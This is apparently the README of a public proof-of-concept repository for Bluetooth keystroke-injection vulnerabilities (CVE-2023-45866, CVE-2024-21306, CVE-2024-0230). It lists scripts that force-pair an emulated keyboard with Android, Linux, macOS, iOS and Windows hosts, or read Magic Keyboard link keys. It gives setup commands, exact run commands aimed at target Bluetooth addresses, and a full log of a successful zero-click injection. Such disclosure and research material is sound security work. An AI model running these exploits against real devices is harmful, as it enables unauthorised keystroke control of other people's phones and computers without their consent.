
Bluetooth keystroke injection exploit PoCs for CVE-2023-45866, CVE-2024-21306, and CVE-2024-0230 targeting Android, Linux, macOS, and iOS via emulated HID keyboards.
This repository contains proof-of-concept scripts for CVE-2023-45866, CVE-2024-21306, and CVE-2024-0230. Additional details can be found in the blog post.
| Proof of Concept | Description |
|---|---|
| Android Keystroke Injection | Force-pairs a virtual Bluetooth keyboard with a vulnerable Android device and injects 10 seconds of tab keypresses. |
| Linux Keystroke Injection | Force-pairs a virtual Bluetooth keyboard with a Linux host and injects 10 seconds of tab keypresses. |
| macOS Keystroke Injection | Force-pairs a virtual Bluetooth keyboard with a macOS host and injects keystrokes to open a web browser and perform a Google search. |
| iOS Keystroke Injection | Force-pairs a virtual Bluetooth keyboard with an iOS host and injects keystrokes to open a web browser and navigate to a URL. |
| Windows Keystroke Injection | Force-pairs a virtual Bluetooth keyboard with a Windows host and injects tab keypresses. |
| Magic Keyboard Link Key via Lightning Port | Reads the Bluetooth link key from the Lightning port on a Magic Keyboard. |
| Magic Keyboard Link Key via Bluetooth | Reads the Bluetooth link key from the unauthenticated Bluetooth HID service on the Magic Keyboard. |
| Magic Keyboard Link Key via USB Port on the Mac | Reads the Bluetooth link key for a target Magic Keyboard by spoofing the keyboard over USB to its paired Mac. |
The scripts are known to work on an Ubuntu 22.04 host with a Broadcom-based Bluetooth adapter.
I primarily used this adapter: https://www.amazon.com/Kinivo-USB-Bluetooth-4-0-Compatible/dp/B007Q45EF4
Bus 001 Device 026: ID 0a5c:21e8 Broadcom Corp. BCM20702A0 Bluetooth 4.0
Starting from a clean install of Ubuntu 22.04, the dependencies can be installed with the following commands.
# update apt
sudo apt-get update
sudo apt-get -y upgrade
# install dependencies from apt
sudo apt install -y bluez-tools bluez-hcidump libbluetooth-dev \
git gcc python3-pip python3-setuptools \
python3-pydbus
# install pybluez from source
git clone https://github.com/pybluez/pybluez.git
cd pybluez
sudo python3 setup.py install
# build bdaddr from the bluez source
cd ~/
git clone --depth=1 https://github.com/bluez/bluez.git
gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth
sudo cp bdaddr /usr/local/bin/
Android devices are vulnerable prior to the 2023-12-05 security patch level.
When Bluetooth is enabled on an unpatched Android device, an attacker can pair an emulated Bluetooth keyboard and inject keystrokes, without user confirmation. This is a zero-click attack that works whenever Bluetooth is enabled.
This vulnerability affects Android ~4.2.2 and later.
Run the PoC targeting Android device 5C:F3:70:AA:07:BD using interface hci1.
./keystroke-injection-android-linux.py -i hci1 -t 5C:F3:70:AA:07:BD
If successful, the PoC will inject a payload of tab keystrokes for 10 seconds.
> ./keystroke-injection-android-linux.py -i hci1 -t 5C:F3:70:AA:07:BD
[2024-01-07 11:03:01.329] executing 'sudo service bluetooth restart'
[2024-01-07 11:03:01.959] configuring Bluetooth adapter
[2024-01-07 11:03:01.963] calling RegisterProfile
[2024-01-07 11:03:01.966] running dbus loop
[2024-01-07 11:03:02.096] executing 'sudo hciconfig hci1 name Hi, My Name is Keyboard'
[2024-01-07 11:03:02.108] executing 'hciconfig hci1 name'
[2024-01-07 11:03:02.128] executing 'sudo hciconfig hci1 class 0x002540'
[2024-01-07 11:03:02.141] executing 'hciconfig hci1 class'
[2024-01-07 11:03:02.144] executing 'hcitool name 5C:F3:70:AA:07:BD'
[2024-01-07 11:03:02.877] connecting to SDP
[2024-01-07 11:03:02.877] connecting to 5C:F3:70:AA:07:BD on port 1
[2024-01-07 11:03:03.832] SUCCESS! connected on port 1
[2024-01-07 11:03:03.832] executing 'sudo btmgmt --index hci1 io-cap 1'
[2024-01-07 11:03:03.847] executing 'sudo btmgmt --index hci1 ssp 1'
[2024-01-07 11:03:03.858] connected to SDP (L2CAP 1) on target
[2024-01-07 11:03:03.865] 'NoInputNoOutput' pairing-agent is running
[2024-01-07 11:03:04.111] connecting to 5C:F3:70:AA:07:BD on port 19
[2024-01-07 11:03:04.864] ERROR connecting on port 19: [Errno 22] Invalid argument
[2024-01-07 11:03:04.864] connecting to 5C:F3:70:AA:07:BD on port 17
[2024-01-07 11:03:04.932] SUCCESS! connected on port 17
[2024-01-07 11:03:04.932] connecting to HID Interrupt
[2024-01-07 11:03:04.932] connecting to 5C:F3:70:AA:07:BD on port 19
[2024-01-07 11:03:05.008] SUCCESS! connected on port 19
[2024-01-07 11:03:05.008] connected to HID Interrupt (L2CAP 19) on target
[2024-01-07 11:03:05.008] connected to HID Control (L2CAP 17) on target
[2024-01-07 11:03:05.009] [RX-17] 9000
[2024-01-07 11:03:05.009] [TX-17] 00
[2024-01-07 11:03:05.065] [RX-19] a20101
[2024-01-07 11:03:05.259] [TX-19] a101000000000000000000
[2024-01-07 11:03:05.259] injecting Tab keypresses for 10 seconds
[2024-01-07 11:03:05.259] [TX-19] a10100002b000000000000
[2024-01-07 11:03:05.264] [TX-19] a101000000000000000000
[2024-01-07 11:03:05.318] [TX-19] a10100002b000000000000
[2024-01-07 11:03:05.323] [TX-19] a101000000000000000000
[2024-01-07 11:03:05.377] [TX-19] a10100002b000000000000
[2024-01-07 11:03:05.382] [TX-19] a101000000000000000000
[2024-01-07 11:03:05.436] [TX-19] a10100002b000000000000
...
[2024-01-07 11:03:15.261] [TX-19] a101000000000000000000
[2024-01-07 11:03:15.319] payload has been transmitted; disconnecting Bluetooth HID client
[2024-01-07 11:03:15.321] taking 'hci1' offline
Linux hosts running BlueZ 5 are vulnerable prior to patches rolling out in approximately December 2023. Specific version numbers depend on the Linux distribution.
When an unpatched Linux host is discoverable and connectable over Bluetooth, an attacker can pair an emulated Bluetooth keyboard and inject keystrokes, without user confirmation. This is a zero-click attack that works whenever the host is discoverable and connectable.
This vulnerability is understood to affect unpatched Linux distributions using the default configuration of BlueZ 5.
Google states that ChromeOS was not affected by this vulnerability, and while ChromeOS was not tested as part of this research, their BlueZ configuration does appear to prevent the attack.
Affected distributions include Ubuntu, Debian, Gentoo, Arch, Fedora, Red Hat, Yocto, and Amazon Linux. Multiple releases may be affected, and Ubuntu, for instance, patched 16.04, 18.04, 20.04, 22.04, 23.04 and 23.10.
Run the PoC targeting Linux host 58:28:39:E6:AE:1C using interface hci1.
./keystroke-injection-android-linux.py -i hci1 -t 58:28:39:E6:AE:1C
If successful, the PoC will inject a payload of tab keystrokes for 10 seconds.